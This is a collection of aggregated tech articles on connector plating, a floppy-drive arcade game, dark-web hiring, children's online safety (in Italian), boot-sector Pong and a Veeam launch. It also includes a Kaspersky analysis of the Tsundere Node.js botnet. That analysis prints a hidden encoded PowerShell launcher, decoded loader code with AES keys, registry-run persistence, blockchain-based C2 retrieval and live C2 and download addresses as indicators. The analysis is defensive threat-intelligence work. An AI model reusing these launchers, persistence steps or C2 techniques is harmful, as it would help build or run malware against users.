While far superior to pure copper or non-phosphor bronze for use in contacts, phosphor bronze is, at best, a compromise material. It’s good enough in almost all categories — strength, elasticity, conductivity, wear resistance — but not really great in any of them. It’s the “Jack of all trades, master of none” of the electrical contact world, which, coupled with its easy workability and low cost, makes it the metal of choice for the contacts in commodity connectors. If a manufacturer is making a million copies of a connector, especially ones that are cheap enough that nobody will cry too much if they have to be replaced, chances are good that they’ll choose phosphor bronze. It’s also the alloy most likely to be used for connectors intended for low mating-cycle applications, like the aforementioned dishwasher Molex.

For more mission-critical contacts, a different alloy is generally called for: beryllium copper. Also known as spring copper, beryllium copper contains up to about 3% beryllium, but for electrical uses, it’s usually around 0.7% with a little cobalt and nickel added in. Beryllium copper is everything that phosphor bronze is, and more. It’s stronger and springier, it’s a far better electrical conductor, and it also has a better ability to withstand creep under load. Also known as stress relaxation, creep under load is the tendency for a spring to lose its strength over time, which reduces its normal force. Phosphor bronze has pretty good stress relaxation resistance, but when it heats up past around 125°C, it starts to lose spring force — not ideal for high-power applications. Beryllium copper is easily able to withstand 150°C or more, making it a better choice for power connectors.

Beryllium copper also has a higher elastic modulus than phosphor bronze, which makes it easier to create small contacts that still have enough normal force to maintain good contact. Smaller is better when it comes to modern high-density connectors, so you’ll often see beryllium copper used in fine-pitch connectors. It also has better fatigue life and tends to maintain normal force over repeated mating cycles, making it desirable for connectors that specify cycle lives in the thousands. But just because it’s desirable doesn’t make it a shoo-in — beryllium copper is at least three times more expensive than phosphor bronze. That means it’s usually reserved for connectors that can justify the added expense.

Noble Is Only Skin Deep

No matter what the base metal is for connector contacts, chances are good that the finished contact will have some sort of plated finish. Plating is important because it protects the base metal from oxidation, as well as increasing the wear resistance of contacts and improving their electrical conductivity. Plating metals fall into two broad categories: noble (principally gold, with silver used sometimes for high-power connectors, as well as palladium, but only very rarely) and non-noble platings.

Noble metal finishes are quite common in high-density connectors, RF applications, and high-speed digital circuits, as well as high-reliability applications and connectors that are expected to have high mating cycles. But at the risk of stating the obvious, gold is expensive, so it’s used only on connectors that really need it. And even then, it’s very rare that the entire contact is plated. While that would be incredibly expensive — gold is currently pushing $4,000 an ounce — the real reason is that gold isn’t particularly solderable. So generally, selective plating is used to deposit gold only on the mating surfaces of contacts, with the tail of the contact plated in a non-noble metal to improve solderability.

youtube.com/embed/AtwVm_3YrwI?…

Among the non-noble finishes, tin and tin alloys are the first choice. Aside from its excellent solderability, tin alloys do a great job at protecting the base metal from corrosion. However, the tin plating itself begins to oxidize almost immediately after it’s applied. This would seem to be a problem, but it’s easily addressed by using more spring force in the contacts to break through the oxide layer to fresh tin. Tin-plated contacts typically specify normal forces of 100 grams or more, while noble metal contacts can get by with 30 grams or less. Also, tin contacts require much thicker plating than noble metal finishes. Tin is generally specified for commodity connectors and anywhere the number of mating cycles is likely to be low.

Don’t You Fret

Although corrosion is obviously something to be avoided, the real enemy when it comes to connector durability is metal-on-metal contact. The spring pressure between contacts unavoidably digs into the plating, and while that’s actually desirable in tin-plated contacts, too much of a good thing is bad. Digging past the plating into the base metal marks the end of the road for many connectors, as the base metal’s relatively lower conductivity increases the resistance of the connection, potentially leading to intermittent connections and even overheating. Again, noble metals perform better in this regard, at least in the long run, as their lower normal force reduces friction and results in a longer-lived contact.

There’s another metallurgical phenomenon that can wreak havoc on connectors: fretting. Fretting is caused by tiny movements of the contacts against each other, on the order of 10^-7 meters, generally in response to low-g vibrations but also as a result of thermal expansion and contraction. Fretting damage occurs when the force of micromotions between contacts exceeds the normal force exerted between them. This leads to one contact sliding over the other by a tiny amount, digging a trench through the plating metal. In tin-plated contacts, this exposes fresh tin, which oxidizes instantly, forming an insulating surface. Further micromotions expose more fresh tin, which leads to more oxides. Eventually the connection fails due to high resistance. Fretting is insidious because it happens even without a lot of mating cycles; all it takes is a little vibration and some time. And those are the enemies of all connectors.

hackaday.com/2025/11/20/mating…

There’s a tactile joy to the humble 3.5″ floppy that no USB stick will ever match. It’s not just the way they thunk into place in a well-made drive, the eject button, too, is a tactile experience not to be missed. If you were a child in disk-drive days, you may have popped a disk in-and-out repeatedly just for the fun of it — and if you weren’t a child, and did it anyway, we’re not going to judge. [igor] has come up with a physical game called “Floppy Flopper” that provides an excuse to do just that en masse, and it looks like lots of fun.

It consists of nine working floppy drives in a 3×3 grid, all mounted on a hefty welded-steel frame. Each drive has an RGB LED above it. The name of the game is to swap floppies as quickly as possible so that the color of the floppy in the drive matches the color flashing above it. Each successful insertion is worth thirteen points, tracked on a lovely matrix display. Each round is faster than the last, until you miss the window or mix up colors in haste. That might make more sense if you watch the demo video below.

[igor] could have easily faked this with NFC tags, as we’ve seen floppy-like interfaces do, or perhaps just use a color sensor. But no, those nine drives are all in working order. In the interest of speed — this is a timed challenge, after all, and we don’t need a PC slowing it down — each floppy is given its own microcontroller. Rather than reading data off the disk, only the disk’s write-protect and density holes are checked. He’s only using R, G, and B for floppy colors, so those four bits are enough. Unfortunately [igor]’s collection of floppies is very professional — lots of black and grey — so he needed to use colored stickers instead of technicolor plastic.

The project is open source, if you happen to have a stack of floppy drives of your own. If you don’t, but still want to play, the area, the Floppy Flopper is being exhibited at RADIONA in Rijeka, Croatia until December 5th 2025. If you happen to be in the neighborhood, it might be worth a trip.

If we had a nickle for every physical game that used a floppy drive, we’d have two nickles just this year. Which isn’t a lot, but it’s kind of neat to see so long after the last diskettes came off the production lines.

youtube.com/embed/wWfkXNIbJLw?…

hackaday.com/2025/11/20/disket…

In 2022, we published our research examining how IT specialists look for work on the dark web. Since then, the job market has shifted, along with the expectations and requirements placed on professionals. However, recruitment and headhunting on the dark web remain active.

So, what does this job market look like today? This report examines how employment and recruitment function on the dark web, drawing on 2,225 job-related posts collected from shadow forums between January 2023 and June 2025. Our analysis shows that the dark web continues to serve as a parallel labor market with its own norms, recruitment practices and salary expectations, while also reflecting broader global economic shifts. Notably, job seekers increasingly describe prior work experience within the shadow economy, suggesting that for many, this environment is familiar and long-standing.

The majority of job seekers do not specify a professional field, with 69% expressing willingness to take any available work. At the same time, a wide range of roles are represented, particularly in IT. Developers, penetration testers and money launderers remain the most in-demand specialists, with reverse engineers commanding the highest average salaries. We also observe a significant presence of teenagers in the market, many seeking small, fast earnings and often already familiar with fraudulent schemes.

While the shadow market contrasts with legal employment in areas such as contract formality and hiring speed, there are clear parallels between the two. Both markets increasingly prioritize practical skills over formal education, conduct background checks and show synchronized fluctuations in supply and demand.

Looking ahead, we expect the average age and qualifications of dark web job seekers to rise, driven in part by global layoffs. Ultimately, the dark web job market is not isolated — it evolves alongside the legitimate labor market, influenced by the same global economic forces.

In this report, you’ll find:

• Demographics of the dark web job seekers
• Their job preferences
• Top specializations on the dark web
• Job salaries
• Comparison between legal and shadow job markets

Read the full report (English, PDF)

securelist.com/dark-web-job-ma…

Oggi ricorre la Giornata Mondiale dell’Infanzia, fissata dall’ONU il 20 novembre per ricordare due atti fondamentali: la Dichiarazione dei Diritti del Fanciullo del 1959 e, trent’anni dopo, la Convenzione sui Diritti dell’Infanzia e dell’Adolescenza del 1989.

Un appuntamento che, ogni anno, rischia di diventare un gesto rituale, un promemoria sterile sul “diritto al futuro”.

Eppure il presente ci dice che la vera fragilità non sta nel futuro, ma nel modo in cui i bambini vivono oggi: in un ecosistema digitale che non è stato pensato per loro, non li protegge e li espone a rischi che non assomigliano più a niente di ciò che conoscevamo.

Un mondo adulto abitato da minori

Negli ultimi anni la ricerca internazionale, dai rapporti dell’OECD alla documentazione tecnica della Internet Watch Foundation, mostra con sempre maggiore chiarezza un fenomeno che continuiamo a non guardare con lucidità: i minori non sono più utenti occasionali. Sono immersi nella rete, dentro sistemi che funzionano per adulti e secondo logiche che ignorano completamente ciò che significa essere vulnerabili a undici o dodici anni.

Secondo l’OECD, nei paesi occidentali oltre il novantacinque per cento degli adolescenti accede a Internet ogni giorno, spesso più volte al giorno. Non si tratta semplicemente di “uso intensivo”, ma di un’esposizione costante a piattaforme dove identità e intenzioni non sono mai del tutto leggibili. La rete è diventata lo spazio principale di relazione, gioco, confronto e scoperta. Ma resta un ambiente progettato per massimizzare attenzione e permanenza, non per ridurre i rischi.

L’abuso che nasce dentro le relazioni

La Internet Watch Foundation, nel suo report 2023, ha analizzato 275.652 pagine web contenenti materiale di abuso sessuale su minori. Oltre il 92% di queste è stato classificato come “self-generated”: un termine che la stessa IWF definisce inadeguato, perché non riflette la realtà dei fatti. In molti casi i bambini vengono ingannati, manipolati, estorti o addirittura registrati a loro insaputa da qualcuno che non è fisicamente presente nella stanza.

È il segnale più chiaro della trasformazione in corso: l’abuso non arriva più da un luogo remoto, ma si infiltra nelle interazioni quotidiane, dentro applicazioni usate da tutti, dentro conversazioni che iniziano in modo innocuo e poi scivolano verso spazi sempre più privati. L’immagine del “predatore digitale” che si affaccia dall’esterno è superata. Oggi la minaccia si costruisce dall’interno delle relazioni, nelle chat dei videogiochi, nei social più popolari, in un ecosistema che rende semplice avvicinare, convincere, manipolare. Un ragazzino non deve cercare il rischio: è il rischio che trova lui, spesso travestito da normalità.

Un ecosistema criminale frammentato

Nel frattempo le reti criminali hanno adottato un modello operativo molto più frammentato rispetto al passato. Le indagini europee – dai rapporti IOCTA di Europol alla documentazione di INHOPE e IWF – mostrano che la vera trasformazione non riguarda più il contatto iniziale, ma ciò che accade dopo: una volta ottenuto il materiale, la sua circolazione segue una catena complessa, che attraversa livelli diversi della rete.

La raccolta avviene sempre più spesso in spazi intermedi, come chat private o servizi cloud, mentre la distribuzione si sposta verso circuiti chiusi o criptati, e solo in una fase successiva, quando necessario, negli strati meno accessibili della rete.

Questo meccanismo multilivello non riguarda l’adescamento, ma la diffusione, e riduce drasticamente la possibilità di intercettare tracce dirette. Ogni anomalia, per quanto minima, diventa un indizio prezioso.

L’esplosione silenziosa di Telegram

La portata del problema emerge anche da ciò che accade nelle piattaforme che consideriamo “ordinarie”. Negli ultimi giorni il canale ufficiale “Stop Child Abuse” di Telegram ha pubblicato una sequenza di aggiornamenti che difficilmente può essere ignorata: 1.998 gruppi e canali chiusi il 15 novembre, 1.937 il 16, 2.359 il 17. In tre giorni, più di seimila spazi dedicati alla condivisione o circolazione di materiale di abuso. Nel mese, la conta supera già le trentaseimila chiusure.

Non sono numeri del dark web, e non riguardano reti sotterranee. Sono gruppi visibili abbastanza da essere rilevati, segnalati e rimossi ogni giorno. La quantità non racconta solo la gravità. Racconta soprattutto la continuità: ogni rimozione è rimpiazzata da nuove aperture, con strutture che si ricostruiscono in poche ore, spesso automaticamente, spesso con gli stessi amministratori, spesso con gli stessi contenuti che migrano di stanza in stanza.

Questi dati mostrano con crudezza ciò che il dibattito pubblico fatica ancora a riconoscere: il problema non è confinato nelle periferie della rete. È parte integrante dell’infrastruttura digitale che usiamo tutti, tutti i giorni. Ed è proprio questa vicinanza – silenziosa, normalizzata, tecnicamente invisibile a chi non la cerca – che rende la protezione dell’infanzia un tema strutturale e non emergenziale.

Il lavoro invisibile che salva i bambini

In questo contesto, una parte cruciale del contrasto all’abuso resta quasi invisibile: l’identificazione delle vittime. È un lavoro silenzioso, fatto di dettagli – un oggetto sullo sfondo, un arredo ricorrente, un frammento visivo che riappare altrove – ricomposti fino a restituire un luogo, una situazione reale, una persona da proteggere.

Ed è qui che oggi si concentra gran parte dell’attività investigativa. Riconoscere una vittima permette molto più spesso di arrivare anche all’autore. Il contrario non è sempre vero: un account può essere identificato, ma i minori coinvolti restano senza nome, senza contesto, senza un perimetro di intervento.

Questo lavoro non produce annunci né operazioni spettacolari, ma risultati concreti. Ogni volta che un bambino viene localizzato, quasi sempre la traccia iniziale era un dettaglio che nessuno avrebbe notato. È un processo che non si vede; si vedono solo gli effetti.

L’IA che amplifica il danno senza che il minore agisca

A rendere il quadro ancora più complesso c’è l’introduzione massiva dell’intelligenza artificiale generativa. Non serve essere allarmisti per riconoscere che basta una singola immagine pubblica per creare, manipolare o distorcere contenuti che il minore non ha mai prodotto. Il danno non avviene più solo attraverso ciò che viene chiesto ai bambini, ma attraverso ciò che la tecnologia può costruire al posto loro. È una vulnerabilità che esiste anche quando il minore non compie nessuna azione.

Non è solo un problema educativo: è un problema di architettura

Tutto questo ci porta a un punto chiave: la protezione dei minori non è solo questione di educazione digitale. È, prima di tutto, una questione di architettura. Le piattaforme sono nate per incentivare la condivisione, non per prevenirne gli abusi. Gli algoritmi ottimizzano engagement, non sicurezza. I sistemi di segnalazione sono reattivi, non preventivi. E la risposta non può essere banalizzata con l’idea che basti un controllo dell’età, un accesso con SPID o un filtro all’ingresso. La vulnerabilità non nasce dal login: nasce da ciò che accade dentro le piattaforme, da come vengono modellate le interazioni, da quali dinamiche favoriscono o ignorano.

Ridurre la sicurezza dei bambini a un problema di autenticazione significa guardare la porta d’ingresso e ignorare tutto ciò che accade nelle stanze interne. La protezione reale si gioca nei processi invisibili: nei criteri con cui gli algoritmi decidono cosa mostrare, nei limiti imposti alle interazioni, nella capacità delle piattaforme di riconoscere comportamenti anomali prima che diventino danno.

Ripensare il digitale dalla base

Se la Giornata Mondiale dell’Infanzia ha ancora un senso, allora oggi deve diventare il momento in cui accettiamo che la rete non è un luogo neutrale e che i diritti dei bambini, nell’ambiente digitale, non possono essere consigliati: devono essere progettati. Finché le piattaforme continueranno a considerare i minori come utenti qualsiasi, finché gli algoritmi continueranno a trattare i loro comportamenti come segnali da ottimizzare, finché la moderazione resterà un tappabuchi e non una funzione strutturale, la vulnerabilità rimarrà sistemica.

L’infanzia digitale non è un’estensione dell’infanzia reale. È un terreno diverso, con rischi diversi, costruito su logiche che bambini e adolescenti non hanno gli strumenti per interpretare. E finché questa distanza non verrà colmata, continueremo a celebrare una ricorrenza che parla di diritti, mentre il mondo che abbiamo costruito li mette costantemente alla prova.

Come affrontare davvero il problema

Affrontare questo problema non significa solo “educare meglio i bambini”, né “mettere più controllo”, né pretendere che famiglie e scuole compensino limiti che non dipendono esclusivamente da loro.
Significa riprogettare il digitale in modo che i minori non siano più un effetto collaterale del sistema.

Vuol dire chiedere alle piattaforme trasparenza sugli algoritmi, limiti chiari sulle interazioni, controlli strutturali sulle dinamiche di contatto, moderazione che intervenga prima e non dopo. Vuol dire spostare la responsabilità su chi costruisce gli ambienti – non su chi li subisce. Vuol dire considerare l’infanzia non come un caso particolare, ma come una condizione di progetto, al pari della sicurezza informatica, della privacy o dell’accessibilità.

E, soprattutto, significa smettere di pensare che il rischio sia un incidente. Il rischio è una conseguenza del design.

La protezione dei minori nel digitale non è un gesto di cura: è un requisito tecnico.
E finché non verrà trattato come tale, continueremo a discutere di diritti mentre il sistema, semplicemente, non li contempla.

Punto di vista finale

Ogni volta che qualcuno dice “ma i ragazzi devono imparare a difendersi, ormai sono nativi digitali e più svegli di noi”, ricordo che nel 2025 un adolescente ha la stessa capacità esecutiva e di previsione delle conseguenze che aveva nel 1990.
È l’ambiente che è cambiato radicalmente, non la neurobiologia infantile.

Il digitale non è “nato cattivo”.
È nato senza considerare che ci sarebbero stati dentro anche loro.

Adesso lo sappiamo.
Non abbiamo più scuse.

L'articolo Giornata Mondiale dell’Infanzia: I bambini vivono nel digitale, ma il digitale non è stato progettato per loro proviene da Red Hot Cyber.

Introduction

Tsundere is a new botnet, discovered by our Kaspersky GReAT around mid-2025. We have correlated this threat with previous reports from October 2024 that reveal code similarities, as well as the use of the same C2 retrieval method and wallet. In that instance, the threat actor created malicious Node.js packages and used the Node Package Manager (npm) to deliver the payload. The packages were named similarly to popular packages, employing a technique known as typosquatting. The threat actor targeted libraries such as Puppeteer, Bignum.js, and various cryptocurrency packages, resulting in 287 identified malware packages. This supply chain attack affected Windows, Linux, and macOS users, but it was short-lived, as the packages were removed and the threat actor abandoned this infection method after being detected.

The threat actor resurfaced around July 2025 with a new threat. We have dubbed it the Tsundere bot after its C2 panel. This botnet is currently expanding and poses an active threat to Windows users.

Initial infection

Currently, there is no conclusive evidence on how the Tsundere bot implants are being spread. However, in one documented case, the implant was installed via a Remote Monitoring and Management (RMM) tool, which downloaded a file named pdf.msi from a compromised website. In other instances, the sample names suggest that the implants are being disseminated using the lure of popular Windows games, particularly first-person shooters. The samples found in the wild have names such as “valorant”, “cs2”, or “r6x”, which appear to be attempts to capitalize on the popularity of these games among piracy communities.

Malware implants

According to the C2 panel, there are two distinct formats for spreading the implant: via an MSI installer and via a PowerShell script. Implants are automatically generated by the C2 panel (as described in the Infrastructure section).

MSI installer

The MSI installer was often disguised as a fake installer for popular games and other software to lure new victims. Notably, at the time of our research, it had a very low detection rate.
The installer contains a list of data and JavaScript files that are updated with each new build, as well as the necessary Node.js executables to run these scripts. The following is a list of files included in the sample:
nodejs/B4jHWzJnlABB2B7
nodejs/UYE20NBBzyFhqAQ.js
nodejs/79juqlY2mETeQOc
nodejs/thoJahgqObmWWA2
nodejs/node.exe
nodejs/npm.cmd
nodejs/npx.cmd
The last three files in the list are legitimate Node.js files. They are installed alongside the malicious artifacts in the user’s AppData\Local\nodejs directory.

An examination of the CustomAction table reveals the process by which Windows Installer executes the malware and installs the Tsundere bot:
RunModulesSetup 1058 NodeDir powershell -WindowStyle Hidden -NoLogo -enc JABuAG[...]ACkAOwAiAA==
After Base64 decoding, the command appears as follows:
$nodePath = "$env:LOCALAPPDATA\nodejs\node.exe";
& $nodePath - e "const { spawn } = require('child_process'); spawn(process.env.LOCALAPPDATA + '\\nodejs\\node.exe', ['B4jHWzJnlABB2B7'], { detached: true, stdio: 'ignore', windowsHide: true, cwd: __dirname }).unref();"
This will execute Node.js code that spawns a new Node.js process, which runs the loader JavaScript code (in this case, B4jHWzJnlABB2B7). The resulting child process runs in the background, remaining hidden from the user.

Loader script

The loader script is responsible for ensuring the correct decryption and execution of the main bot script, which handles npm unpackaging and configuration. Although the loader code, similar to the code for the other JavaScript files, is obfuscated, it can be deobfuscated using open-source tools. Once executed, the loader attempts to locate the unpackaging script and configuration for the Tsundere bot, decrypts them using the AES-256 CBC cryptographic algorithm with a build-specific key and nonce, and saves the decrypted files under different filenames.
encScriptPath = 'thoJahgqObmWWA2',
encConfigPath = '79juqlY2mETeQOc',
decScript = 'uB39hFJ6YS8L2Fd',
decConfig = '9s9IxB5AbDj4Pmw',
keyBase64 = '2l+jfiPEJufKA1bmMTesfxcBmQwFmmamIGM0b4YfkPQ=',
ivBase64 = 'NxrqwWI+zQB+XL4+I/042A==',
[...]
const h = path.dirname(encScriptPath),
i = path.join(h, decScript),
j = path.join(h, decConfig)
decryptFile(encScriptPath, i, key, iv)
decryptFile(encConfigPath, j, key, iv)
The configuration file is a JSON that defines a directory and file structure, as well as file contents, which the malware will recreate. The malware author refers to this file as “config”, but its primary purpose is to package and deploy the Node.js package manager (npm) without requiring manual installation or downloading. The unpackaging script is responsible for recreating this structure, including the node_modules directory with all its libraries, which contains packages necessary for the malware to run.

With the environment now set up, the malware proceeds to install three packages to the node_modules directory using npm:

• ws: a WebSocket networking library
• ethers: a library for communicating with Ethereum
• pm2: a Node.js process management tool

Loader script installing the necessary toolset for Tsundere persistence and execution

The pm2 package is installed to ensure the Tsundere bot remains active and used to launch the bot. Additionally, pm2 helps achieve persistence on the system by writing to the registry and configuring itself to restart the process upon login.

PowerShell infector

The PowerShell version of the infector operates in a more compact and simplified manner. Instead of utilizing a configuration file and an unpacker — as done with the MSI installer — it downloads the ZIP file node-v18.17.0-win-x64.zip from the official Node.js website nodejs[.]org and extracts it to the AppData\Local\NodeJS directory, ultimately deploying Node.js on the targeted device. The infector then uses the AES-256-CBC algorithm to decrypt two large hexadecimal-encoded variables, which correspond to the bot script and a persistence script. These decrypted files, along with a package.json file are written to the disk. The package.json file contains information about the malicious Node.js package, as well as the necessary libraries to be installed, including the ws and ethers packages. Finally, the infector runs both scripts, starting with the persistence script that is followed by the bot script.

The PowerShell infector creates a package file with the implant dependencies

Persistence is achieved through the same mechanism observed in the MSI installer: the script creates a value in the HKCU:\Software\Microsoft\Windows\CurrentVersion\Run registry key that points to itself. It then overwrites itself with a new script that is Base64 decoded. This new script is responsible for ensuring the bot is executed on each login by spawning a new instance of the bot.

Tsundere bot

We will now delve into the Tsundere bot, examining its communication with the command-and-control (C2) server and its primary functionality.

C2 address retrieval

Web3 contracts, also known as smart contracts, are deployed on a blockchain via transactions from a wallet. These contracts can store data in variables, which can be modified by functions defined within the contract. In this case, the Tsundere botnet utilizes the Ethereum blockchain, where a method named setString(string _str) is defined to modify the state variable param1, allowing it to store a string. The string stored in param1 is used by the Tsundere botnet administrators to store new WebSocket C2 servers, which can be rotated at will and are immutable once written to the Ethereum blockchain.
The Tsundere botnet relies on two constant points of reference on the Ethereum blockchain:

• Wallet: 0x73625B6cdFECC81A4899D221C732E1f73e504a32
• Contract: 0xa1b40044EBc2794f207D45143Bd82a1B86156c6b

In order to change the C2 server, the Tsundere botnet makes a transaction to update the state variable with a new address. Below is a transaction made on August 19, 2025, with a value of 0 ETH, which updates the address.

Smart contract containing the Tsundere botnet WebSocket C2

The state variable has a fixed length of 32 bytes, and a string of 24 bytes (see item [2] in the previous image) is stored within it. When this string is converted from hexadecimal to ASCII, it reveals the new WebSocket C2 server address: ws[:]//185.28.119[.]179:1234.

To obtain the C2 address, the bot contacts various public endpoints that provide remote procedure call (RPC) APIs, allowing them to interact with Ethereum blockchain nodes. At the start of the script, the bot calls a function named fetchAndUpdateIP, which iterates through a list of RPC providers. For each provider, it checks the transactions associated with the contract address and wallet owner, and then retrieves the string from the state variable containing the WebSocket address, as previously observed.

Malware code for retrieval of C2 from the smart contract

The Tsundere bot verifies that the C2 address starts with either ws:// or wss:// to ensure it is a valid WebSocket URL, and then sets the obtained string as the server URL. But before using this new URL, the bot first checks the system locale by retrieving the culture name of the machine to avoid infecting systems in the CIS region. If the system is not in the CIS region, the bot establishes a connection to the server via a WebSocket, setting up the necessary handlers for receiving, sending, and managing connection states, such as errors and closed sockets.

Bot handlers for communication

Communication

The communication flow between the client (Tsundere bot) and the server (WebSocket C2) is as follows:

1. The Tsundere bot establishes a WebSocket connection with the retrieved C2 address.
2. An AES key is transmitted immediately after the connection is established.
3. The bot sends an empty string to confirm receipt of the key.
4. The server then sends a nonce (IV), enabling the use of encrypted communication from that point on.
   Encryption is required for all subsequent communication.
5. The bot transmits the OS information of the infected machine, including the MAC address, total memory, GPU information, and other details. This information is also used to generate a unique identifier (UUID).
6. The C2 server responds with a JSON object, acknowledging the connection and confirming the bot’s presence.
7. With the connection established, the client and server can exchange information freely.
   
   1. To maintain the connection, keep-alive messages are sent every minute using ping/pong messages.
   2. The bot sends encrypted responses as part of the ping/pong messages, ensuring continuous communication.

   
   

Tsundere communication process with the C2 via WebSockets

The connections are not authenticated through any additional means, making it possible for a fake client to establish a connection.

As previously mentioned, the client sends an encrypted ping message to the C2 server every minute, which returns a pong message. This ping-pong exchange serves as a mechanism for the C2 panel to maintain a list of currently active bots.

Functionality

The Tsundere bot is designed to allow the C2 server to send dynamic JavaScript code. When the C2 server sends a message with ID=1 to the bot, the message is evaluated as a new function and then executed. The result of this operation is sent back to the server via a custom function named serverSend, which is responsible for transmitting the result as a JSON object, encrypted for secure communication.

Tsundere bot evaluation code once functions are received from the C2

The ability to evaluate code makes the Tsundere bot relatively simple, but it also provides flexibility and dynamism, allowing the botnet administrators to adapt it to a wide range of actions.

However, during our observation period, we did not receive any commands or functions from the C2 server, possibly because the newly connected bot needed to be requested by other threat actors through the botnet panel before it could be utilized.

Infrastructure

The Tsundere bot utilizes WebSocket as its primary protocol for establishing connections with the C2 server. As mentioned earlier, at the time of writing, the malware was communicating with the WebSocket server located at 185.28.119[.]179, and our tests indicated that it was responding positively to bot connections.

The following table lists the IP addresses and ports extracted from the provided list of URLs:

Marketplace and control panel

No business is complete without a marketplace, and similarly, no botnet is complete without a control panel. The Tsundere botnet has both a marketplace and a control panel, which are integrated into the same frontend.

Tsundere botnet panel login

The notable aspect of Tsundere’s control panel, dubbed “Tsundere Netto” (version 2.4.4), is that it has an open registration system. Any user who accesses the login form can register and gain access to the panel, which features various tabs:

• Bots: a dashboard displaying the number of bots under the user’s control
• Settings: user settings and administrative functions
• Build: if the user has an active license, they can create new bots using the two previously mentioned methodologies (MSI or PowerShell)
• Market: this is the most interesting aspect of the panel, as it allows users to promote their individual bots and offer various services and functionalities to other threat actors. Each build can create a bot that performs a specific set of actions, which can then be offered to others
• Monero wallet: a wallet service that enables users to make deposits or withdrawals
• Socks proxy: a feature that allows users to utilize their bots as proxies for their traffic

Tsundere botnet control panel, building system and market

Each build generates a unique build ID, which is embedded in the implant and sent to the C2 server upon infection. This build ID can be linked to the user who created it. According to our research and analysis of other URLs found in the wild, builds are created through the panel and can be downloaded via the URL:
hxxps://idk.1f2e[REDACTED]07a4[.]net/api/builds/{BUILD-ID}.msi.
At the time of writing this, the panel typically has between 90 and 115 bots connected to the C2 server at any given time.

Attribution

Based on the text found in the implants, we can conclude with high confidence that the threat actor behind the Tsundere botnet is likely Russian-speaking. The use of the Russian language in the implants is consistent with previous attacks attributed to the same threat actor.

Russian being used throughout the code

Furthermore, our analysis suggests a connection between the Tsundere botnet and the 123 Stealer, a C++-based stealer available on the shadow market for $120 per month. This connection is based on the fact that both panels share the same server. Notably, the main domain serves as the frontend for the 123 Stealer panel, while the subdomain “idk.” is used for the Tsundere botnet panel.

123 Stealer C2 panel sharing Tsundere’s infrastructure and showcasing its author

By examining the available evidence, we can link both threats to a Russian-speaking threat actor known as “koneko”. Koneko was previously active on a dark web forum, where they promoted the 123 Stealer, as well as other malware, including a backdoor. Although our analysis of the backdoor revealed that it was not directly related to Tsundere, it shared similarities with the Tsundere botnet in that it was written in Node.js and used PowerShell or MSI as infectors. Before the dark web forum was seized and shut down, koneko’s profile featured the title “node malware senior”, further suggesting their expertise in Node.js-based malware.

Conclusion

The Tsundere botnet represents a renewed effort by a presumably identified threat actor to revamp their toolset. The Node.js-based bot is an evolution of an attack discovered in October of last year, and it now features a new strategy and even a new business model. Infections can occur through MSI and PowerShell files, which provides flexibility in terms of disguising installers, using phishing as a point of entry, or integrating with other attack mechanisms, making it an even more formidable threat.
Additionally, the botnet leverages a technique that is gaining popularity: utilizing web3 contracts, also known as “smart contracts”, to host command-and-control (C2) addresses, which enhances the resilience of the botnet infrastructure. The botnet’s possible author, koneko, is also involved in peddling other threats, such as the 123 Stealer, which suggests that the threat is likely to escalate rather than diminish in the coming months. As a result, it is essential to closely monitor this threat and be vigilant for related threats that may emerge in the near future.

Indicators of compromise

More IoCs related to this threat are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

File hashes
235A93C7A4B79135E4D3C220F9313421
760B026EDFE2546798CDC136D0A33834
7E70530BE2BFFCFADEC74DE6DC282357
5CC5381A1B4AC275D221ECC57B85F7C3
AD885646DAEE05159902F32499713008
A7ED440BB7114FAD21ABFA2D4E3790A0
7CF2FD60B6368FBAC5517787AB798EA2
E64527A9FF2CAF0C2D90E2238262B59A
31231FD3F3A88A27B37EC9A23E92EBBC
FFBDE4340FC156089F968A3BD5AA7A57
E7AF0705BA1EE2B6FBF5E619C3B2747E
BFD7642671A5788722D74D62D8647DF9
8D504BA5A434F392CC05EBE0ED42B586
87CE512032A5D1422399566ECE5E24CF
B06845C9586DCC27EDBE387EAAE8853F
DB06453806DACAFDC7135F3B0DEA4A8F

File paths
%APPDATA%\Local\NodeJS

Domains and IPs
ws://185.28.119[.]179:1234
ws://196.251.72[.]192:1234
ws://103.246.145[.]201:1234
ws://193.24.123[.]68:3011
ws://62.60.226[.]179:3001

Cryptocurrency wallets
Note: These are wallets that have changed the C2 address in the smart contract since it was created.
0x73625B6cdFECC81A4899D221C732E1f73e504a32
0x10ca9bE67D03917e9938a7c28601663B191E4413
0xEc99D2C797Db6E0eBD664128EfED9265fBE54579
0xf11Cb0578EA61e2EDB8a4a12c02E3eF26E80fc36
0xdb8e8B0ef3ea1105A6D84b27Fc0bAA9845C66FD7
0x10ca9bE67D03917e9938a7c28601663B191E4413
0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84
0x46b0f9bA6F1fb89eb80347c92c9e91BDF1b9E8CC

securelist.com/tsundere-node-j…

You might be surprised to find out that [Akshat Joshi’s] Pong game that fits in a 512-byte boot sector isn’t the first of its kind. But that doesn’t mean it isn’t an accomplishment to shoehorn useful code in that little bitty space.

As you might expect, a game like this uses assembly language. It also can’t use any libraries or operating system functions because there aren’t any at that particular time of the computer startup sequence. Once you remember that the bootloader has to end with two magic bytes (0x55 0xAA), you know you have to get it all done in 510 bytes or less.

This version of Pong uses 80×25 text mode and writes straight into video memory. You can find the code in a single file on GitHub. In the old days, getting something like this working was painful because you had little choice but reboot your computer to test it and hope it went well. Now you can run it in a virtual machine like QEMU and even use that to debug problems in ways that would have made a developer from the 1990s offer up their life savings.

We’ve seen this before, but we still appreciate the challenge. We wonder if you could write Pong in BootBasic?

hackaday.com/2025/11/20/pong-g…

Con nuove funzionalità per anticipare le minacce e accelerare il ripristino grazie a sicurezza di nuova generazione, approfondimenti forensi e automazione intelligente, Veeam lancia anche la Universal Hypervisor Integration API, una piattaforma di integrazione flessibile per hypervisor.

Seattle, WA – 19 novembre 2025 – Veeam® Software, leader globale n.1 nella resilienza dei dati, lancia oggi Veeam Data Platform v13 – una release rivoluzionaria che ridefinisce lo standard per la cyber resilienza, la protezione intelligente dei dati e la libertà dei dati nell’era dell’IA. Questa versione rappresenta un’evoluzione fondamentale della piattaforma dati più affidabile del settore. Progettata per un mondo caratterizzato da ransomware incessanti, rapide trasformazioni infrastrutturali e innovazioni nell’intelligenza artificiale, Veeam Data Platform v13 offre una resilienza senza precedenti, flessibilità incomparabile e l’intelligenza necessaria per il futuro guidato dall’IA.

